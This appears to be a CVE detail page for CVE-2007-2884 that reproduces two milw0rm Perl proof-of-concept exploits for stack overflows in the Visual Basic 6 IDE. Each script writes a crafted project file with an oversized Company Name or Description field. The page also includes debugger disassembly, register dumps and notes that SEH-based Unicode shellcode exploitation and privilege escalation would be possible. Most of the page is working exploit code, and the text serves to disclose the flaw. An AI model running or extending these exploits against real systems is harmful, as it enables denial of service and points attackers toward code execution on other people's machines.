CVE-2007-2884 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/local/bin/perl #Discovered By UmZ (Umair Manzoor) #comments are welcome at umz32.dll[at]gmail.com #Dated 23-02-2007 #Time : 02:00 AM PST # #Visual Basic Project (Company Name) Stack Overflow #Affected Version : Tested on Visual basic 6 #Threats : DoS, Previlidges Escilation (System become unstable for more then 40 minutes and so) #From : Local system # #Actually Exception occur again and again and again make 100% usage of CPU # # #*The vulnerability would not effect until the project description (Project Property page and select Company Name) has been opened up to view. # #*When binary file is generated with crafted Visual basic project it would not contain any details of vendor and other information. #Details: # Owned Registers are ESI and EDI. Compnay name is dumped at Memory Address of : 04520020. Due to stack overflow USER32 stuck into loop (that last # for more then 30 minutes in testing). # # The CPU usuage becomes 100% causing the system to become unstable and can crash the OS if enduser is on low system memory. This vulnerability can # be exploit to cause DOS or Previledge escilation. UNICODE exploitation must be implemented in order to exploit this vulnerability. # The generated Binary File is also attached which cann't display any of details of vendor information in EXE format (due to overflow). # #Debug Details: # This is the debug details which clearly mention the loop in which exception got stuck, causing it to occur again and again # #77D8D96F 837D F8 00 CMP DWORD PTR SS:[EBP-8],0 #77D8D973 74 08 JE SHORT USER32.77D8D97D #77D8D975 3C 20 CMP AL,20 #77D8D977 74 04 JE SHORT USER32.77D8D97D #77D8D979 3C 09 CMP AL,9 #77D8D97B 75 2C JNZ SHORT USER32.77D8D9A9 #77D8D97D 3C 0D CMP AL,0D #77D8D97F 74 28 JE SHORT USER32.77D8D9A9 #77D8D981 50 PUSH EAX #77D8D982 53 PUSH EBX #77D8D983 E8 68FAFFFF CALL USER32.77D8D3F0 #77D8D988 85C0 TEST EAX,EAX #77D8D98A 75 1D JNZ SHORT USER32.77D8D9A9 #77D8D98C 47 INC EDI #77D8D98D 8A07 MOV AL,BYTE PTR DS:[EDI] #77D8D98F 3C 20 CMP AL,20 #77D8D991 74 04 JE SHORT USER32.77D8D997 #77D8D993 3C 09 CMP AL,9 #77D8D995 75 07 JNZ SHORT USER32.77D8D99E #77D8D997 C745 F8 01000000 MOV DWORD PTR SS:[EBP-8],1 #77D8D99E 807F FF 0A CMP BYTE PTR DS:[EDI-1],0A #77D8D9A2 74 05 JE SHORT USER32.77D8D9A9 #77D8D9A4 3B7D 10 CMP EDI,DWORD PTR SS:[EBP+10] #77D8D9A7 ^72 C6 JB SHORT USER32.77D8D96F # # #Values of Register are as follows: #EAX 00000041 #ECX 09E0C300 #EDX 00150608 #EBX 001DC0C0 #ESP 0013E900 #EBP 0013E914 #ESI 04520020 ASCII #"AAAAAAAAAAAAAAAAA......... truncated #EDI 045E61D0 ASCII #"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... truncated #EIP 77D8D96F USER32.77D8D96F # # # Disclaimer: This Proof of concept exploit is for educational purpose only. # Please do not use it against any system without prior permission. # You are responsible for yourself for what you do with this code. # This exploit is just POC, it will generate the crafted VB project. print("\nVisual Basic Company Name Stack overflow"); print("\nAffected Version : Tested on Visual basic 6"); print("\nThreats : DoS, Previlidges Escilation"); print("\nFrom : Local system"); print("\n----------------------------------------------"); print("\nDiscovered & Coded by UmZ"); print("\numz32.dll[at]gmail.com"); open (MYFILE, '>>Form2.frm'); print MYFILE "VERSION 5.00\n"; print MYFILE "Begin VB.Form Form1\n"; print MYFILE q(Caption = "Form1"); print MYFILE "\nClientHeight = 3495\n"; print MYFILE "ClientLeft = 60\n"; print MYFILE "ClientTop = 345\n"; print MYFILE "ClientWidth = 4680\n"; print MYFILE q(LinkTopic = "Form1"); print MYFILE "\nScaleHeight = 3495\n"; print MYFILE "ScaleWidth = 4680\n"; print MYFILE "StartUpPosition = 3 'Windows Default\n"; print MYFILE "Begin VB.CommandButton Command2\n"; print MYFILE q(Caption = "write"); print MYFILE "\nHeight = 495\n"; print MYFILE "Left = 2400\n"; print MYFILE "TabIndex = 2\n"; print MYFILE "Top = 2640\n"; print MYFILE "Width = 1935\n"; print MYFILE "End\n"; print MYFILE "Begin VB.TextBox Text1\n"; print MYFILE "Height = 2175\n"; print MYFILE "Left = 480\n"; print MYFILE "MultiLine = -1 'True\n"; print MYFILE "TabIndex = 1\n"; print MYFILE q(Text = "Form1.frx":0000); print MYFILE "\nTop = 360\n"; print MYFILE "Width = 3855\n"; print MYFILE "End\n"; print MYFILE "Begin VB.CommandButton Command1\n"; print MYFILE q(Caption = "read"); print MYFILE "\nHeight = 495\n"; print MYFILE "Left = 480\n"; print MYFILE "TabIndex = 0\n"; print MYFILE "Top = 2640\n"; print MYFILE "Width = 1935\n"; print MYFILE "End\n"; print MYFILE "End\n"; print MYFILE q(Attribute VB_Name = "Form1"); print MYFILE "\nAttribute VB_GlobalNameSpace = False\n"; print MYFILE "Attribute VB_Creatable = False\n"; print MYFILE "Attribute VB_PredeclaredId = True\n"; print MYFILE "Attribute VB_Exposed = False\n"; close (MYFILE); open (MYFILE, '>>vuln2.vbp'); print MYFILE "Type=Exe\n"; print MYFILE "Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINDOWS\\system32\\stdole2.tlb#OLE Automation\n"; print MYFILE "Reference=*\\G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#..\\..\\..\\..\\WINDOWS\\system32\\scrrun.dll#Microsoft Scripting Runtime\n"; print MYFILE "Form=Form2.frm\n"; print MYFILE q(Startup="Form2"); print MYFILE "\nHelpFile=".q(""); print MYFILE "\nCommand32=".q(""); print MYFILE "\nName=".q("Project1"); print MYFILE "\nHelpContextID=".q("0"); #print MYFILE "\nDescription=".q(")."A" x1037690 .q("); print MYFILE "\nCompatibleMode=".q("0"); print MYFILE "\nMajorVer=1"; print MYFILE "\nMinorVer=0"; print MYFILE "\nRevisionVer=0"; print MYFILE "\nAutoIncrementVer=0"; print MYFILE "\nServerSupportFiles=0"; print MYFILE "\nVersionCompanyName=".q(")."A" x1037690 .q("); print MYFILE "\nCompilationType=0"; print MYFILE "\nOptimizationType=0"; print MYFILE "\nFavorPentiumPro(tm)=0"; print MYFILE "\nCodeViewDebugInfo=0"; print MYFILE "\nNoAliasing=0"; print MYFILE "\nBoundsCheck=0"; print MYFILE "\nOverflowCheck=0"; print MYFILE "\nFlPointCheck=0"; print MYFILE "\nFDIVCheck=0"; print MYFILE "\nUnroundedFP=0"; print MYFILE "\nStartMode=0"; print MYFILE "\nUnattended=0"; print MYFILE "\nRetained=0"; print MYFILE "\nThreadPerObject=0"; print MYFILE "\nMaxNumberOfThreads=1"; print MYFILE "\n[MS Transaction Server]"; print MYFILE "\nAutoRefresh=1"; close (MYFILE); print("\n\nCrafted Project has been generated!!!\n\n"); # milw0rm.com [2007-05-23]

#!/usr/local/bin/perl #Discovered By UmZ (Umair Manzoor) #comments are welcome at umz32.dll[at]gmail.com #Dated 23-02-2007 #Time : 02:00 AM PST # #Stack Overflow #Buffer Size 1037690 #overflow offset 004A2E43 #EBX contain values #Memory to write 03B50188 # # # # #Visual Basic Project Description Stack overflow #Affected Version : Tested on Visual basic 6 #Threats : DoS, Previlidges Escilation #From : Local system # # #Details: # Microsoft Visual Basic 6.0 IDE crashes while parsing the project detail's field when characters more then 1037690 are provided, # causing stack overflow (vuln1.vbp in attached file). The data is stored as UNICODE means that Shellcode can be injected in unicode manner # to escilate previledges. # As soon as the stack get overflow, an exception occur and NTDLL start handling it => means that SEH based exploitation will work. # Offset is mentioned above at which IDE crash. Register EBX contain the malicious values. # Memory address at which the malicous data (Project detail) are dumped is: 03EF0189 and on words. # #OVERFLOW CODE n Instructions: # #004A2E43 |. 8501 TEST DWORD PTR DS:[ECX],EAX #004A2E45 |. 3D 00100000 CMP EAX,1000 #004A2E4A |.^73 EC JNB SHORT VB6.004A2E38 #004A2E4C \.^EB DB JMP SHORT VB6.004A2E29 # Disclaimer: This Proof of concept exploit is for educational purpose only. # Please do not use it against any system without prior permission. # You are responsible for yourself for what you do with this code. # This exploit is just POC, it will generate the crafted VB project. print("\nVisual Basic Project Description Stack overflow"); print("\nAffected Version : Tested on Visual basic 6"); print("\nThreats : DoS, Previlidges Escilation"); print("\nFrom : Local system"); print("\n----------------------------------------------"); print("\nDiscovered & Coded by UmZ"); print("\numz32.dll[at]gmail.com"); open (MYFILE, '>>Form1.frm'); print MYFILE "VERSION 5.00\n"; print MYFILE "Begin VB.Form Form1\n"; print MYFILE q(Caption = "Form1"); print MYFILE "\nClientHeight = 3495\n"; print MYFILE "ClientLeft = 60\n"; print MYFILE "ClientTop = 345\n"; print MYFILE "ClientWidth = 4680\n"; print MYFILE q(LinkTopic = "Form1"); print MYFILE "\nScaleHeight = 3495\n"; print MYFILE "ScaleWidth = 4680\n"; print MYFILE "StartUpPosition = 3 'Windows Default\n"; print MYFILE "Begin VB.CommandButton Command2\n"; print MYFILE q(Caption = "write"); print MYFILE "\nHeight = 495\n"; print MYFILE "Left = 2400\n"; print MYFILE "TabIndex = 2\n"; print MYFILE "Top = 2640\n"; print MYFILE "Width = 1935\n"; print MYFILE "End\n"; print MYFILE "Begin VB.TextBox Text1\n"; print MYFILE "Height = 2175\n"; print MYFILE "Left = 480\n"; print MYFILE "MultiLine = -1 'True\n"; print MYFILE "TabIndex = 1\n"; print MYFILE q(Text = "Form1.frx":0000); print MYFILE "\nTop = 360\n"; print MYFILE "Width = 3855\n"; print MYFILE "End\n"; print MYFILE "Begin VB.CommandButton Command1\n"; print MYFILE q(Caption = "read"); print MYFILE "\nHeight = 495\n"; print MYFILE "Left = 480\n"; print MYFILE "TabIndex = 0\n"; print MYFILE "Top = 2640\n"; print MYFILE "Width = 1935\n"; print MYFILE "End\n"; print MYFILE "End\n"; print MYFILE q(Attribute VB_Name = "Form1"); print MYFILE "\nAttribute VB_GlobalNameSpace = False\n"; print MYFILE "Attribute VB_Creatable = False\n"; print MYFILE "Attribute VB_PredeclaredId = True\n"; print MYFILE "Attribute VB_Exposed = False\n"; close (MYFILE); open (MYFILE, '>>vuln1.vbp'); print MYFILE "Type=Exe\n"; print MYFILE "Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINDOWS\\system32\\stdole2.tlb#OLE Automation\n"; print MYFILE "Reference=*\\G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#..\\..\\..\\..\\WINDOWS\\system32\\scrrun.dll#Microsoft Scripting Runtime\n"; print MYFILE "Form=Form1.frm\n"; print MYFILE q(Startup="Form1"); print MYFILE "\nHelpFile=".q(""); print MYFILE "\nCommand32=".q(""); print MYFILE "\nName=".q("Project1"); print MYFILE "\nHelpContextID=".q("0"); print MYFILE "\nDescription=".q(")."A" x1037690 .q("); print MYFILE "\nCompatibleMode=".q("0"); print MYFILE "\nMajorVer=1"; print MYFILE "\nMinorVer=0"; print MYFILE "\nRevisionVer=0"; print MYFILE "\nAutoIncrementVer=0"; print MYFILE "\nServerSupportFiles=0"; print MYFILE "\nVersionCompanyName=".q(""); print MYFILE "\nCompilationType=0"; print MYFILE "\nOptimizationType=0"; print MYFILE "\nFavorPentiumPro(tm)=0"; print MYFILE "\nCodeViewDebugInfo=0"; print MYFILE "\nNoAliasing=0"; print MYFILE "\nBoundsCheck=0"; print MYFILE "\nOverflowCheck=0"; print MYFILE "\nFlPointCheck=0"; print MYFILE "\nFDIVCheck=0"; print MYFILE "\nUnroundedFP=0"; print MYFILE "\nStartMode=0"; print MYFILE "\nUnattended=0"; print MYFILE "\nRetained=0"; print MYFILE "\nThreadPerObject=0"; print MYFILE "\nMaxNumberOfThreads=1"; print MYFILE "\n[MS Transaction Server]"; print MYFILE "\nAutoRefresh=1"; close (MYFILE); print("\n\nCrafted Project has been generated!!!\n\n"); # milw0rm.com [2007-05-23]